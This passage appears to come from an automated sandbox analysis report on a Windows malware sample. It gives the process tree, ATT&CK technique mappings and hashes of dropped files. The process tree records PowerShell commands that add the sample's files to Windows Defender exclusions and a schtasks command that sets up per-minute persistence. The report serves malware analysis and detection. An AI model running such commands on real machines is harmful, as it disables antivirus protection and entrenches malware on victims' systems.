  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1192
- C:\Users\Admin\AppData\Local\Temp\temporary4125099041\temp.bin
  C:\Users\Admin\AppData\Local\Temp\temporary4125099041\temp.bin
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4200
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\temporary4125099041\temp.bin'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'temp.bin'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\ReAgentC.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ReAgentC.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3572
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ReAgentC" /tr "C:\Users\Admin\AppData\Local\ReAgentC.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5152

C:\Users\Admin\AppData\Local\ReAgentC.exe
C:\Users\Admin\AppData\Local\ReAgentC.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1216

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd0949cc40,0x7ffd0949cc4c,0x7ffd0949cc58
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1768,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=1764 /prefetch:2
  2⤵
  PID:5232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2044,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  PID:4508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2184,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=2200 /prefetch:8
  2⤵
  PID:5472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:6020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:3128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4444 /prefetch:1
  2⤵
  PID:4996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4720,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4732 /prefetch:8
  2⤵
  PID:2792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4896 /prefetch:8
  2⤵
  PID:4248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4556,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=4304 /prefetch:1
  2⤵
  PID:5072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3392,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=3272 /prefetch:8
  2⤵
  - NTFS ADS
  PID:5524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5268,i,5640844137079784838,1314030175669871248,262144 --variations-seed-version=20240709-050124.519000 --mojo-platform-channel-handle=5336 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1628

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:5972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3732

C:\Users\Admin\AppData\Local\ReAgentC.exe
C:\Users\Admin\AppData\Local\ReAgentC.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2168

C:\Users\Admin\AppData\Local\ReAgentC.exe
C:\Users\Admin\AppData\Local\ReAgentC.exe
1⤵
- Executes dropped EXE
PID:5720

C:\Users\Admin\AppData\Local\ReAgentC.exe
C:\Users\Admin\AppData\Local\ReAgentC.exe
1⤵
- Executes dropped EXE
PID:4168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\772d9959-a846-48e6-834f-3f47fbd6b429.tmp

Filesize
185KB

MD5
2b850b9af12873879c19f36aafa9815f

SHA1
64c5e110de869040f3c25b21bf4f7958262f2dea

SHA256
701967bf0237293c098cb997a4679463849bb2e8c3de8ca63c64dac5c6485bb4

SHA512
66909704b6e7dc831c652f298f265722b5e2cc9c8fc5fa12ac3f958378828de4da9496187e4a8de4c251ab56a52dfc382415d93f479aa01af0e7d9c011f6c916

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
efaf72694d8e83948c472cadf7101765

SHA1
85fdca282ea83b136f45a3883539f85c32a687dc

SHA256
3a82642ee7dd30766e51774460f37c42d29252cfe8dac70ffc2e8c7f5d3c5f66

SHA512
ebee7d347d173743cc23e58b0d48b033a9b823495df74f526be42a736fc3c730d7e4324ada6b574d7f3d66f5477e1feeead176e8cc835c7fba96ae70e795d90e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
f4f54732d5d464bde7fb855cef3e1651

SHA1
da9b4cd7cff65b93a9bb7416af83683ef307d2e1

SHA256
afc2cf6ec59df706e555ad6955a457a34d211d346848d707478c6ca8db639f25

SHA512
69036c09b8bdd923e1dddc76915a26e60fb52c1229b87944e7de6b9073e54e108109c3a2208704a53dbc7f7b4557705c8de3fd5b5b817c95f23ff813b3144b0e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
1451a38f8351efb436e98f800bf5fe11

SHA1
bfe30296d30108a34d8785cf619c8a07fb3f713f

SHA256
64ba308ad7f5726fc82add08e7a1508f8d17955393204cffc27fa57ed55624ee

SHA512
d67becdd4f87a6820a9eeeb731e990d02ad792a3afe3d2a5ec042f6c0fb32b471356537b9d5d90930fb758f9c34eedd09aa985f52bbcda55e894b8b0e18961ee

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
3586865598f7e3f2799bcffa8addfebd

SHA1
cae9fd73735d93a164c766351968cd60d1caa270

SHA256
1202f1f2bf0b30c56bdc117c1c560a4e1bc24d2fd31cfe51fb23cef6f7535c00

SHA512
346f9844076598c04d32afe1eba860bbfc255deb4baaedd9a62713ea46f06aef5fd2deca9486923655f02e4708bc6ef682d5c145695a0737bf4e49335e213945

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
17ce238720e08bc6d189ea2fd2e3570d

SHA1
ddb2b3029c3557deb4bca697618e13300105e709

SHA256
032a206bcdb5464cfd68efea5a58bd5148c973fdc8835a88e73bde271d5892c3

SHA512
86a6d7fc76d208340353fefc731d7984cb6590f8fc631b90182ab085e3039987580a4aad17e439d5c0cae32f36d3d6eddbfc3e53bfe7e595da8e8111821df3e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7b39c6b504d15665f7286bc070969239

SHA1
0b9acb535fba0395f91cfa6aded21c554a664bf2

SHA256
b7b637de9873f313d6eed948f414ae4ea655e4e7abc836aa89a965d0246c4546

SHA512
e41f99de96a7dd86d16a4e984c4f27aad3b01ee6c17b26458808a8922c399b20cf767cba9b3b070e3cc6aa5b74e992c0892e4742b456a3ea3fef95aa85b1d2bb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1c292f051ef86f0ad8c03d65688e6276

SHA1
9fdda4ce62b88c61b18b7c662bce3c2c59dd33dc

SHA256
5b712d6f68bbbdec715774157b94d3652c96eac4c105caf570ee9e32147c1813

SHA512
3a56b0aeb8e684e56a015fe29849cdf54469c102e84c6f26647e1a06ea96adc65c56985e89f4c8057f857fba1547151b1be1005c0fa08ad14baa6b9f10b56b5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0e9a01e6aebf9d6c13cf65dcc7db55f0

SHA1
8da77411dbf167c0856b36aa2931ffdbd4e31e31

SHA256
91d5a073c040e379b4a80b7901121dbc63e65c1a22ad1e473070f1ee5ce8ce1c

SHA512
136e38c4607edaa570227e124f389f0e20ab1e7dba8668de152fb39934b6c0c781a725d627030c8da7b9708f33be40fc54f996e8c4ae2a2452ede8388fc39b70

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9d8f9c3ff78ed8cc1daf0dca734b8200

SHA1
ac6dcf064ef02949feca988261b9f9fdd68f1e5f

SHA256
66a6cc0057128899f6cbf433bf8629adc1938618538c55a62431813852a0523c

SHA512
bf09a1fa805cfb494bb22b4f1a85d58b6b669123851f08823e04bdb6e181c790e2f49e104a9d622ffc16c9a09a59bb41db18627ef0f27ae2edcbb14dc3262f16

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e42d585ffa71c28c5e54c8f68e4d4900

SHA1
0aa0fc1c8b14d8de0002933d11defcc1fb292502

SHA256
77b787d75b3a91449a483ad38f8cccefdbc518d56f0f0aa9e79437e825f0d489

SHA512
52d6de0c622b9fc27d05b04a8bdb50353cb5b4d99872b00dc2813ecab643e3c6865db0145e956f93b7df9d18340c4c6b548ae89acecca528b53f55c2acc818f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a2e0bb7df28260bd4e036b13bb823ad2

SHA1
e91bb5c9407a1598055ca005e4f35140c738dd29

SHA256
4f91e67c177dd2070108cf9d8cdbf93ae36e7575a7b8ba2dabb4f71c8b467a4a

SHA512
7e4d131c6dd730918a5e94994331689ff117f5614d5dfd08819987af2bbc95b7d6ba1fc23f14940ea2c2e680e1f11ee1367297a2a2e281bebd90a880221e4e6b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
62ebc93d176097fc36686f83977af646

SHA1
a8514430f6c8bd60735b1afd16119d3cba75f94e

SHA256
473eb9617b28a59685fdd84785817f6759bd05e50f81fe1776fca23af72bcca5

SHA512
4eb7d54b53304accc724f66b7fb1d12a52fc2c0a5799dee9944fac7f089a1794df2c3228138d4095e787d84f23c38d7e2898f14d8fc1d51b1f026929259a0831

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
bdfb095a19aa962f16740809f00f4351

SHA1
a93c20186fadadb4c0de3b2d3fb9d4ed836f57a9

SHA256
d1f2e06996f74e907894b7f3823d5afd217a3a58d96f474010e1883bbc85a19b

SHA512
b4cfbc27f6db845d5a0c1a5d87cb5aaf04b46b6370ccda5776dbdce293e968ad19c0928573e192f082752b266df81d7e0c4b15523bfba4c1b75e8b2939ac2da3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ca6b610ae581c991f2963fb2d14cc7f6

SHA1
b8abfcae75ea4380c606ce5af0dda2e99988028e

SHA256
22948ab89e511662f84f3c3ddfa2902400bd067541fb8f5f8e1a67b02265dd86

SHA512
11d055cd34e899000fca4977692bc806448d6fe3f06a2570668732fb0e6620084ad818cf815b0ec749d04f6f0a8c792dbf2c01081af3d39df6af7ff586d06ccb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
2a395281670c2973cb07da4f2b2046cc

SHA1
8f1f5b472642f7b25609bcf599e08102cd9592f3

SHA256
73fd63918e29afa3dc037c1ff179dd003493af072c9091beeef6e91107c1e378

SHA512
9dfb23d921927d97291d3eb4514a3aa9643cfe69a5c728ade690df47ec794b26f45efcfaf3f7fa49d9b0b77b46d36fa4f4a59f128998a4cd47a0b6a919cfa458

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
2dfb00414629a2afe962ba72d79bce9b

SHA1
b55d5b335c264e5167154d0d8efd8276e8ab3c6c

SHA256
410fcccc6c61f58aff76e450608f0b1e58347b2711623cc967834e4f8b077e62

SHA512
e43b6571569e95c719ee836d5b92ea4a05626ae9e33209c198b8e96c0985563c929244d164f2fbe58cdb466b8cdac9a14373e5761d6105044baee8a0f63f3fd2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
185KB

MD5
d4b89e59e2f52ef5ce3a709feaf7c334

SHA1
c4496fb28f166faac20aed7d8d4c88504619c430

SHA256
132eb7a9aeb0d9320d75305bd3cfa3a0ae68f35313cad802e474ff72df0db0d3

SHA512
bee17c362c84a467aa19ff0d830598777d83d1a217aaa797ccbc48f7dca95d972ab98aa9bedb0a6e819f3cc5700dd1e2eac0211ffbb41e8fea726af6a634f60a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
185KB

MD5
b110c12a7dbdc64b1f7847989f29803c

SHA1
3e5ad90877bd8524faa6f9aae93a0a185a9abd0b

SHA256
3936fc65ab7e4497385f1dff81538a11ee544b804b61cf41fed46c7316d454a2

SHA512
0b42f270586a0337ebfc2fbec9875528d86e46fee5ed79b9582900810db2a29e7ebb0434def28b2a40863edc2806a3c1b7e3d7140e520df72501e8a3c7432474

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
378b6291d6c4e89ab1a8e87d061c4b24

SHA1
14188fcb9a00dcdf0ea519d839d092a8f3d8098f

SHA256
2bda076e561bc440dacf78173c14542f6708717bb8e2bbe3dd2a4ddbc6ee006b

SHA512
d3f48abf616140bfc6973a28a08434813ece019c6338d5894a85bdda6e4228c8b29c183e2ea9da7ef3fabf8cc6a4a485b76646df1512a4202257b1f3a8556e0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ReAgentC.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
918925b4ffb522c4188485a5e84ab6ed

SHA1
f53ee7bacfae671d898075778f668cbf727c5d5e

SHA256
18d5722b4bdd546da121b4c8756096755cab8cb7c40126d93644910d9292f343

SHA512
82d4b87cc804c393a5c812a4dc327743ae928a44f8fd52902410ba43dfae738254e94437b0482c86a93dea416fcb87a34ed892f8541c7508545b3c98dfd4d8ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a36a63c1aec993582f5d7eb8fcd46112

SHA1
2adb8c3eb5ea48ddc8cdd5588c13de009279982f

SHA256
89977894982b134f4f9626c7622110040089dc189a7348680f923590c970748e

SHA512
f5e99b7c9db743a92ef19bbfd2f44df8e3bf80e6f442fd3a09c6156de2b961247c84243da2d1935c6f7a8b12807242c8271ea202635ce1bfdeca328deaef8c75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cef328ddb1ee8916e7a658919323edd8

SHA1
a676234d426917535e174f85eabe4ef8b88256a5

SHA256
a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90

SHA512
747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e8a7ab7bae6a69946da69507ee7ae7b0

SHA1
b367c72fa4948493819e1c32c32239aa6e78c252

SHA256
cd5480d72c1a359e83f7d6b6d7d21e1be2463f2c6718385cc6c393c88323b272

SHA512
89b22519bc3986be52801397e6eff4550621b4804abd2d04f431c9b2591ba8e3eab2625490a56ebb947ba3b122b6186badb6c461e917b69d7e13644c86a6f683

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
13f220b32225fc4bdc00160f199d264a

SHA1
b1e1b31ec6b2d1f22793b3490eb905252d6a6f1a

SHA256
69cbec7c741e79dbbf1c8ab1046eb8edd0585f7ad56432e9a341114ec51b4c2a

SHA512
f7a0074ff42f81c4eac7815c16b29a902ac933e8367698678e05582d6b6d237a20f1b282451d4112085e4479e179cb54960831d459c91109168363cb9276c782

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA5C5.tmp

Filesize
1KB

MD5
3e75c48255ac1f5267f53a0ab56f6a8d

SHA1
55c29f4a98f5368ef1574124bc2cba83eeb190f8

SHA256
a20132fe08c53cf8dee801ca223135f69d7431f1aafe2e3db6d9e1fdea6e0417

SHA512
4898e2b195f215152d0f77eceaed4d09bc8d4146f4869a4f1f92d23f5e83e18913ae73cccb20a9455143f137635e3a9aa4877bf3048c746e35499e4715e75e9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\U1b3bEyKvN\Display (1).png

Filesize
421KB

MD5
72f121a1d0735367df73fcee832cb203

SHA1
442fdb7430d610de9bc7ff46145a7ff7c6d8afd4

SHA256
c3b801ffdd843f7d15c28d1c528f5174546ad255c94f4dd4f6c1e14c7e8789f7

SHA512
0f6d54b1d0328e1c16d60f3d750f9109e59d113dd1785259374b9c1ff81e7d00f412934f10d68e784b238afab57b649e05db18b30cb7f546074609231142385b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x052r4zg.khp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ryd345hd\ryd345hd.dll

Filesize
4KB

MD5
fd638f33269735c9671972ceb8d09541

SHA1
8b31c026d505de220553cdeeb56f5b4af184f38f

SHA256
0b21a50e95f97ea6f9d8f67b3d6e0cd7588d65feb16da0a37e203dc8ef94a126

SHA512
47aeb2000ac916b37ed8eb90e6c48b6a44fdfa1b84d15ed76144bbf945c17f24c1fff09f0a7d28fcc6006473fde000e83c8f8397e9f13a652a59fd5b2d6f7fc7

Download Submit
C:\Users\Admin\AppData\Local\Temp\temporary4125099041\temp.bin

Filesize
47KB

MD5
553c00955e99378bc3ef277923142eb7

SHA1
1b24cf7d42eb47c312f6c9885917f19e71df0f46

SHA256
bbd60a4ef1fb749f70610f531cc976d0947298446774bf228d4b38e3b2bcde85

SHA512
016f6dbe5049702b9dfe61262290bb7e636396c598d203b71c4be5a36d1070e88e31d6e0ede97e4a3083601065ea8200fd7f26d783d3e78d4cec54dcb42b4a67

Download Submit
C:\Users\Admin\Downloads\wv.zip.crdownload

Filesize
8.1MB

MD5
74f1a556858306f10facdd13afef3876

SHA1
2785e176a4fb8360ed0708205104a77d48e385a2

SHA256
c7a74e51044e62ab518f212afb21d7fbe6ad6cc428868ebb8729e754bd8b0b10

SHA512
1af1c05ba7e5043928c7d4b14db051dc07445e7ed950bc4f9a751cefc9b44f729f0a91690695d7f4863dcb96ba8877ff6c4735761c1b518c03bf3280e380f6d7

Download Submit
C:\Users\Admin\Downloads\wv.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
